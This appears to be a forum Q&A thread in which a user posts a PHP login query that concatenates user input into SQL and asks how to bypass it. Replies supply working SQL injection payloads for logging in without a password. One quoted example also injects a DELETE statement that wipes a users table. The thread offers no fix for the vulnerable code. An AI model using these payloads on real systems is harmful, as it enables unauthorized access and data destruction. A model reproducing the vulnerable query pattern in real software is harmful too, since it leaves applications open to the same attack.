$sql_checkpasswd = "SELECT user_id, username, user_password, user_active
FROM " . USERS_TABLE . "
WHERE username = '" . $username . "'" . " AND user_password = '" . md5($password). "'";
Above is how my php code is written. This is for a login page.
How can use sql injection technique to login without knowing password?
Thanks
I tried all possible combinations ' OR '1=1'
' OR '1=1' --
admin');#
and all usual one's.
Error for one of the query: http://prntscr.com/53bmv8
P.s.: I have spent a great deal of time doing research on the subject and tried many different methods, which is why I am posting this question in order to get some help. I'm new at sql injection.
I finally figured this out, might help someone else having same question:
Enter this in username field:
admin' AND 1=1 or '1'='1
Above username works fine, I dont have to enter password and can leave it blank since the query becomes
$username= admin' AND 1=1 OR '1'='1 AND $password = anything
Even if one condition is satisfied in above query, i get the access and the username part is True since 1=1AND admin is an existing username
Try the following input:
' OR '1=1' LIMIT 1 --
including a space after -- which does not show up here, for some reason.
I copy some example that hope hep you
Java Original: “SELECT * FROM users_table WHERE username=” + “’” + username + “’” + “ AND password = “ + “’” + password + “’”;
•Inserted Password: Aa’ OR ‘’=’
•Java Result: “SELECT * FROM users_table WHERE username=’anyname’ AND password = ‘Aa’ OR ‘ ‘ = ‘ ‘;
•Inserted Password: foo’;DELETE FROM users_table WHERE username LIKE ‘%
•Java Result: “SELECT * FROM users_table WHERE username=’anyname’ AND password = ‘foo’; DELETE FROM users_table WHERE username LIKE ‘%’